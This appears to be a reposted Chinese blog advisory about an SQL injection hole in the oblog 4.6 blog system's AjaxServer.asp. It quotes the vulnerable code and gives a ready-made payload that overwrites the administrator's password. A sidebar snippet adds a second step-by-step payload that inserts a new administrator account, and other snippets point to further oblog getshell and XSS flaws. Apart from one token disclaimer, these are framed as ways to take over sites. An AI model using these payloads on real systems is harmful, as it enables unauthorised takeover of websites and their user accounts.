oblog商业版本4.6注射漏洞,直接拿管理员

最新推荐文章于 2012-07-02 16:57:32 发布
最新推荐文章于 2012-07-02 16:57:32 发布
阅读量109 收藏
点赞数
原文链接:http://www.cnblogs.com/allyesno/archive/2007/08/05/843883.html
版权
漏洞描述:
通过构造特定的语句,可以更改任何用户的密码,包括管理员,严重级漏洞。

漏洞文件:AjaxServer.asp
变量:log_files
语句:log_files=Replace(log_files," ","")
If Left(log_files,1)="," Then log_files=Right(log_files,Len(log_files)-1)
rs("logpics") = log_files
'附加文件处理
If log_files <>"" Then
oblog.Execute "Update oblog_upfile Set logid=" & tid & " Where fileid In (" & log_files & ")"
End if
'Tag处理

利用:
首先找到使用sql版本的系统注册用户test,发表新日志,同时抓包,修改log_files。2);update/**/oblog_user/**/set/**/password= 7a57a5a743894a0e/**/where/**/username=admin;--
关于怎么区别sql和access的版本,目前也没发现好的方法,但是可以通过查看ver.asp文件看到当前版本号。某些版本好象没这文件。 官方好象出补丁了。很多blog门户站都是用的sql的版本,大家就悠着点吧。

转载于:https://www.cnblogs.com/allyesno/archive/2007/08/05/843883.html

weixin_30902251
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oblog4.60漏洞
06-28
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 1、注册一个用户,用户名script,密码123456 2、发布一篇日志,日志标题:测试一下 3、个人前台首页找到日志"测试一下",点"推荐" 4、个人后台管理,选择"常用"选项中的"推荐日志",然后点"测试一下"日志后面的修改,把摘要内容修改成: s'/**/WHERE/** /logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values('script','49ba59abbe56e057',0);-- 5、最后点"确认提交"按钮,如果提示修改成功,注入完成! 6、登录后台,地址/admin/admin_login.asp,输入上面的用户名和密码,登录后台成功! 转的
oblog4.6 最新版本
06-23
在功能特性上,OBLOG4.6版本强化了多项功能。例如,它提供了强大的模板引擎,让用户可以根据自己的喜好定制博客外观,同时支持HTML5和CSS3,使得博客界面更加美观,响应式设计让博客在各种设备上都能良好显示。...
Oblog最新注入漏洞分析
广外女生官方BLOG
09-11 754
 Date:2008-5-15 Author:Yamato[BCT] Version:Oblog 4.5-4.6 sql 代码分析: 文件In/Class_UserCommand.asp : strMonth=Request("month") //第63行 strDay=Request("day") …… Case "month" //第84行 Dim LastDay G_P_FileName =
Oblog博客系统存在SQL注入漏洞http://www.anqn.com 
jahn的专栏
10-28 835
以下是代码片段: Infos: 漏洞预警中心小组漏洞预警公告(BCTWR0701)Author: 疯子Date: 26/10/2007Bug.Center.Team(http://www.cnbct.org)oblog存在SQL注入漏洞发布日期:2007-10-26综述:======根据我们针对
Oblog4.5跨站漏洞
jahn的专栏
10-17 812
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)oblog这套程序大家应该都很熟悉了吧,它凭着它的简洁、安全、稳定成为国内多用户blog的首选。这天无聊,就下了套上个月才出的oblog4.5最新来看代码,谁知,居然看出了N多XSS点。    首先给大家看一个另类点的跨站点,虽然利用价值不大,但是我觉得跨这个点的思路大家可以学习下。我们来看upload.asp和user_
Oblog 2.52导出日志最新漏洞
得峰的专栏 [网络收藏]
05-11 822
/**作者:慈勤强 Http://blog.csdn.net/cqq
Oblog 4.5-4.6 access&mssql getshell 0day
收集盒 Book box
07-02 463
影响范围:4.5 - 4.6 漏洞需求: IIS6.0\开启会员 挖掘作者:henry   绝对原创,技术含量不高,但影响范围比较广..   漏洞文件: AjaxServer.asp (372行) log_filename = Trim(Request("filename"))//未过滤自定义文件名   AjaxServer.asp (259行)(关键) If (oblo
OBLOG4.5 商业SQL 漏洞解析
weixin_34007886的博客
06-26 40
来源:Ruery's Blog声明:本文乃提供脚本学习 不是为了让大家去黑更多的站而写 漏洞已修补 网上的已经没有有漏洞的站了影响版本:oblog4.5 商业SQL (非Final)漏洞补丁地址:[url]http://down.oblog.cn/oblog4/patch/Oblog45_Final_Patch0619.rar[/url]漏洞文件:a...
oblog_4.6_SQL 语句
10-30
这些表可能是oblog_4.6系统中的核心数据结构,如管理员信息、博客明星数据等。 总结来说,这些SQL语句主要用于删除oblog_4.6应用的数据库中的特定表和存储过程,确保在更新或重新部署时,旧的数据库结构可以被干净...
OBLOG4.0 OBLOG4.5漏洞利用分析
10-30
然而,OBLOG4.0与OBLOG4.5版本中存在一个较为严重的安全漏洞,即SQL注入漏洞。这种漏洞如果被恶意利用,可能导致数据泄露、服务器被控制等严重后果。 #### 二、漏洞详情分析 ##### 漏洞文件:`js.asp` 该漏洞主要...
Oblog 4.6
04-30
Oblog 4.6 更新日志:2009-09-28 用户blog页面生成静态化shtml文件,以减轻数据库的压力。 重新设计用户管理后台,全部div+css控制,可更换skin,读取页面更快速,并可兼容智能手机及pda等掌上设备(在treo600等...
ASP源码—oblog v4.6 build 20220827.zip
10-16
在ASP源码中,"oblog v4.6 build 20220827.zip"是一个特定版本的开源博客系统,用于搭建个人或企业博客平台。这个版本的oblog是在2022年8月27日构建的,表明它是该软件的最新更新。 ASP技术主要基于.NET框架,允许...
关于Oblog 2.52 help.asp漏洞的修补问题
得峰的专栏 [网络收藏]
05-11 806
关于Oblog 2.52 help.asp漏洞的修补问题 这是一件很有意思的事情。 OBlog是一套基于asp的Blog系统,目前的版本是2.52吧。 前些日子,出现了个help.asp文件漏洞, 可以查看任意文件的
基于Springboot和Vue的 企业客户管理系统源码 企业客户管理系统代码(98分期末优秀大作业)
08-04
企业客户管理系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
VXLAN手动隧道 集中式网关,不同子网互访
08-04
VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不同子网互访。VXLAN手动隧道 集中式网关,不
PostmanCanary-win64-8.0.6-canary01-Setup
08-04
PostmanCanary-win64-8.0.6-canary01-Setup
基于MATLAB的公路裂缝检测.zip
最新发布
08-04
在MATLAB中,可以使用图像处理和计算机视觉工具包来实现裂缝缺陷的识别。以下是一种可能的实现方式: 1. 导入图像:使用imread函数导入需要处理的图像。例如,img = imread('image.jpg')。 2. 图像预处理:对图像进行预处理以增强裂缝缺陷的可见性。这可以包括灰度化、平滑和增强对比度等操作。例如,gray_img = rgb2gray(img)将彩色图像转换为灰度图像。 3. 裂缝缺陷检测:使用合适的算法和方法来检测裂缝缺陷。其中一种常用的方法是Canny边缘检测算法。例如,edges = edge(gray_img, 'canny')。 4. 裂缝缺陷分割:根据边缘图像,可以使用分割算法将裂缝缺陷与其他图像区域分离。一种常用的分割方法是基于阈值的方法。例如,bw_img = imbinarize(edges, threshold)。 5. 裂缝缺陷识别:通过计算裂缝缺陷的一些特征来进行识别。可以使用一系列特征提取函数,如regionprops,来计算裂缝缺陷的面积、周长、紧凑性等特征。例如,stats = regionprops(bw_img, '
文艺工作总结汇报PPT模板.pptx
08-04
【作品名称】:述职报告,工作计划,工作总结,计划书,商务计划,转正报告 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
OBLOG新手入门:快速掌握基础操作指南
OBLOG是一款流行的博客平台,它旨在帮助用户轻松创建和管理个人博客。本教程由站长百科教程制作组在2011年9月整理,主要涵盖了从注册账户、设置站点,到实际操作如发表日志、管理相册、留言和评论等核心功能的详细...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值